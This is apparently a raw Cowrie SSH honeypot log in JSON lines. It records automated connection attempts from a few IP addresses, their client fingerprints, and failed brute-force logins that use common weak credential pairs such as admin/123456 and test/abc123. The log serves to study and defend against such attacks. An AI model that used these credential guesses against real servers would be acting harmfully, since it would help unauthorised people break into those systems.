{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:36:13.404008Z","src_ip":"83.168.105.65","session":"f1159d38a13d"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-26T11:36:13.613255Z","src_ip":"83.168.105.65","session":"f1159d38a13d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50120,"dst_ip":"1.2.3.4","dst_port":22,"session":"f45eb2e710ea","protocol":"ssh","message":"New connection: 212.227.125.160:50120 (1.2.3.4:22) [session: f45eb2e710ea]","sensor":"my-vps","timestamp":"2025-08-26T11:36:13.813239Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:13.860215Z","src_ip":"212.227.125.160","session":"f45eb2e710ea"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:36:13.897112Z","src_ip":"212.227.125.160","session":"f45eb2e710ea"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:36:14.133077Z","src_ip":"212.227.125.160","session":"f45eb2e710ea"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:14.655849Z","src_ip":"83.168.105.65","session":"f1159d38a13d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:15.186370Z","src_ip":"212.227.125.160","session":"f45eb2e710ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50888,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca00076821b6","protocol":"ssh","message":"New connection: 212.227.125.160:50888 (1.2.3.4:22) [session: ca00076821b6]","sensor":"my-vps","timestamp":"2025-08-26T11:36:19.457049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:19.457963Z","src_ip":"212.227.125.160","session":"ca00076821b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:36:19.510595Z","src_ip":"212.227.125.160","session":"ca00076821b6"}
{"eventid":"cowrie.login.failed","username":"shutdown","password":"shutdown","message":"login attempt [shutdown/shutdown] failed","sensor":"my-vps","timestamp":"2025-08-26T11:36:19.684885Z","src_ip":"212.227.125.160","session":"ca00076821b6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:20.738554Z","src_ip":"212.227.125.160","session":"ca00076821b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51658,"dst_ip":"1.2.3.4","dst_port":22,"session":"0050340da540","protocol":"ssh","message":"New connection: 212.227.125.160:51658 (1.2.3.4:22) [session: 0050340da540]","sensor":"my-vps","timestamp":"2025-08-26T11:36:25.206598Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:25.207389Z","src_ip":"212.227.125.160","session":"0050340da540"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:36:25.262266Z","src_ip":"212.227.125.160","session":"0050340da540"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx123","message":"login attempt [nginx/nginx123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:36:25.416355Z","src_ip":"212.227.125.160","session":"0050340da540"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:26.644457Z","src_ip":"212.227.125.160","session":"0050340da540"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":54082,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d1e28bfee8c","protocol":"ssh","message":"New connection: 83.168.105.65:54082 (1.2.3.4:22) [session: 4d1e28bfee8c]","sensor":"my-vps","timestamp":"2025-08-26T11:36:28.948516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:28.949236Z","src_ip":"83.168.105.65","session":"4d1e28bfee8c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:36:28.990155Z","src_ip":"83.168.105.65","session":"4d1e28bfee8c"}
{"eventid":"cowrie.login.failed","username":"test","password":"abc123","message":"login attempt [test/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:36:29.113791Z","src_ip":"83.168.105.65","session":"4d1e28bfee8c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:30.156345Z","src_ip":"83.168.105.65","session":"4d1e28bfee8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52430,"dst_ip":"1.2.3.4","dst_port":22,"session":"838a38226201","protocol":"ssh","message":"New connection: 212.227.125.160:52430 (1.2.3.4:22) [session: 838a38226201]","sensor":"my-vps","timestamp":"2025-08-26T11:36:31.085006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:31.086589Z","src_ip":"212.227.125.160","session":"838a38226201"}
{"eventid":"cowrie.session.closed","duration":34.53072786331177,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:31.097285Z","src_ip":"212.227.235.229","session":"4926228ca077"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:36:31.137495Z","src_ip":"212.227.125.160","session":"838a38226201"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"123456","message":"login attempt [ftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:36:31.304465Z","src_ip":"212.227.125.160","session":"838a38226201"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:32.370718Z","src_ip":"212.227.125.160","session":"838a38226201"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53200,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd8256474023","protocol":"ssh","message":"New connection: 212.227.125.160:53200 (1.2.3.4:22) [session: cd8256474023]","sensor":"my-vps","timestamp":"2025-08-26T11:36:36.700273Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:36.718956Z","src_ip":"212.227.125.160","session":"cd8256474023"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:36:36.779430Z","src_ip":"212.227.125.160","session":"cd8256474023"}
{"eventid":"cowrie.login.failed","username":"stream","password":"stream","message":"login attempt [stream/stream] failed","sensor":"my-vps","timestamp":"2025-08-26T11:36:36.978293Z","src_ip":"212.227.125.160","session":"cd8256474023"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:38.041864Z","src_ip":"212.227.125.160","session":"cd8256474023"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":36382,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1ab73278831","protocol":"ssh","message":"New connection: 196.251.86.249:36382 (1.2.3.4:22) [session: c1ab73278831]","sensor":"my-vps","timestamp":"2025-08-26T11:36:42.080166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:42.741939Z","src_ip":"196.251.86.249","session":"c1ab73278831"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:36:42.742841Z","src_ip":"196.251.86.249","session":"c1ab73278831"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53966,"dst_ip":"1.2.3.4","dst_port":22,"session":"10b9eda4fcda","protocol":"ssh","message":"New connection: 212.227.125.160:53966 (1.2.3.4:22) [session: 10b9eda4fcda]","sensor":"my-vps","timestamp":"2025-08-26T11:36:43.623968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:43.838326Z","src_ip":"212.227.125.160","session":"10b9eda4fcda"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:36:43.839352Z","src_ip":"212.227.125.160","session":"10b9eda4fcda"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":37738,"dst_ip":"1.2.3.4","dst_port":22,"session":"74a0daf99cd3","protocol":"ssh","message":"New connection: 83.168.105.65:37738 (1.2.3.4:22) [session: 74a0daf99cd3]","sensor":"my-vps","timestamp":"2025-08-26T11:36:44.427859Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:36:44.428542Z","src_ip":"83.168.105.65","session":"74a0daf99cd3"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456","message":"login attempt [elastic/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:36:44.454086Z","src_ip":"212.227.125.160","session":"10b9eda4fcda"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:36:44.465958Z","src_ip":"83.168.105.65","session":"74a0daf99cd3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:36:44.580077Z","src_ip":"83.168.105.65","session":"74a0daf99cd3"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"qwerty123","message":"login attempt [hadoop/qwerty123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:36:44.724744Z","src_ip":"196.251.86.249","session":"c1ab73278831"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:45.512608Z","src_ip":"212.227.125.160","session":"10b9eda4fcda"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:45.618598Z","src_ip":"83.168.105.65","session":"74a0daf99cd3"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:36:46.377249Z","src_ip":"196.251.86.249","session":"c1ab73278831"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41134,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e407e620a41","protocol":"ssh","message":"New connection: 212.227.125.160:41134 (1.2.3.4:22) [session: 2e407e620a41]","sensor":"my-vps","timestamp":"2025-08-26T11:36:47.220241Z"}
